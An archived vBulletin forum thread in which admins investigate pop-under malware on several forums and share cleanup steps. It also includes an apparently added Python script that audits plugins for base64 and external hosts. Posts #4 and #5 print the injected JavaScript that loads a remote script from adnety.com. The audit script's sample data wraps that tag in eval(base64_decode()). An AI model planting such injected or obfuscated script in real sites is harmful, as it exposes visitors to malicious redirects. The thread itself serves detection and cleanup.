The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!
#1
Pop Unders with false click..!
So, basically I have been noticing many vB forums affected by this pop-under malware.

What happens is, when you make a click on your site, the pop-under appears and it redirects you to these sites:

- adnety.com
- clicknety.com
- namefuze.com

Affected vBulletin sites so far:

- http://www.neogaf.com/forum/showthread.php?t=1229205&page=28
- http://www.tsptalk.com/mb/report-problems/26162-pop-ups-anyone-still-seeing-them.html?
- http://www.contractortalk.com/f45/virus-pop-up-301393/
- https://forums.rajah.com/showthread.php?151343-Pop-ups

FIX:

Quote:
Best Practices...

1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Check your plugins list for any that are not part of a product you've added: AdminCP > Plugins & Products > Plugin Manager. Any listed under 'vBulletin' at the top of the list should be examined carefully and removed if you're unsure as to what they are.

3) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

4) Update the following passwords in addition to your AdminCP:
- FTP
- Database
When updating the database password, ensure you also change your config.php file to use the new password, otherwise your site won't be able to connect to the database.

5) Secure your AdminCP directory via .htaccess/.htpasswd.

Credits: Trevor Hannant
#2
More than likely hidden in a file, called via referencing a URL... could or could not be in base64 format, i.e. encrypted per se. From reading, heck, not sure; will know more once I run into this first-hand, as with all this crud these turd-nuggets (hacker folks) come up with.
#3
Update:
The temporary fix for this issue is to disable the plugin system.
Code:
define('DISABLE_HOOKS', true);
#4
This code is at the top of two of your sites listed; I'd check for that on the site you have access to.

On one site:
Code:
<script type="text/javascript">
var win = [];
win['webid'] = '22357fb864e954c229';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
    var pGTP = document.createElement('script');
    pGTP.type = 'text/javascript';
    pGTP.async = true;
    var selectGtp = document.getElementsByTagName('script')[0];
    pGTP.src = 'https://adnety.com/dashboard/call.js';
    selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>

Code:
<script type="text/javascript">
var win = [];
win['webid'] = '78557fb86330ee36940';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
    var pGTP = document.createElement('script');
    pGTP.type = 'text/javascript';
    pGTP.async = true;
    var selectGtp = document.getElementsByTagName('script')[0];
    pGTP.src = 'https://adnety.com/dashboard/call.js';
    selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>
#5
The site which I have access to is undergoing a server update; I will get you the details once it's done.

This was the code found on their site:
Code:
<script type="text/javascript">
var win = [];
win['webid'] = '46157fb85796a03666';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
    var pGTP = document.createElement('script');
    pGTP.type = 'text/javascript';
    pGTP.async = true;
    var selectGtp = document.getElementsByTagName('script')[0];
    pGTP.src = 'https://adnety.com/dashboard/call.js';
    selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>
#6
Quote:
While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).
#7
Quote:
I am super sleepy as well, 3:25AM at my side of the world.
#8
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.
Thanks from: socialteenz
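The plugin checks advised in posts #1 and #8 (anything listed under the 'vBulletin' product, any base64 code) can be run over exported plugin records. The following is an added example, not code from this thread or from vBulletin; the record field names, the sample records and ALLOWED_HOSTS are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import urlparse

ALLOWED_HOSTS = {"forum.example.com"}  # assumption: hosts the forum really uses
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{24,}={0,2})['"]""")
URL = re.compile(r"""https?://[^\s'"<>)]+""", re.I)
OBFUSCATION = re.compile(r"\b(base64_decode|eval|gzinflate|str_rot13)\s*\(", re.I)


def decoded_layers(code):
    """Yield the plugin code, then every base64 string literal that decodes to text."""
    yield code
    for literal in B64_LITERAL.findall(code):
        try:
            yield base64.b64decode(literal, validate=True).decode("utf-8")
        except ValueError:  # bad padding/alphabet, or decoded bytes are not text
            continue


def audit_plugin(plugin):
    """Return the reasons a plugin record needs manual review (empty list if none)."""
    reasons = []
    if plugin["product"].lower() == "vbulletin":
        reasons.append("listed under the 'vBulletin' product")
    funcs = sorted({name.lower() for name in OBFUSCATION.findall(plugin["phpcode"])})
    if funcs:
        reasons.append("uses " + ", ".join(funcs))
    hosts = set()
    for layer in decoded_layers(plugin["phpcode"]):
        for url in URL.findall(layer):
            host = urlparse(url).hostname
            if host and host not in ALLOWED_HOSTS:
                hosts.add(host)
    if hosts:
        reasons.append("references external host(s): " + ", ".join(sorted(hosts)))
    return reasons

# Constructed sample records; the field names are an assumed export format.
_hidden = "$output .= '<script src=\"https://adnety.com/dashboard/call.js\"></script>';"
SAMPLE_PLUGINS = [
    {"title": "Gallery sidebar", "product": "gallery", "phpcode": "$show['gallery'] = true;"},
    {"title": "init", "product": "vbulletin",
     "phpcode": "eval(base64_decode('%s'));" % base64.b64encode(_hidden.encode()).decode()},
]

if __name__ == "__main__":
    for record in SAMPLE_PLUGINS:
        print(record["title"], "->", audit_plugin(record) or "nothing flagged")
```

A flagged record is a prompt for manual review in the Plugin Manager, not proof of compromise, since some legitimate addons also ship base64 code.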
#9
Quote:
Thanks.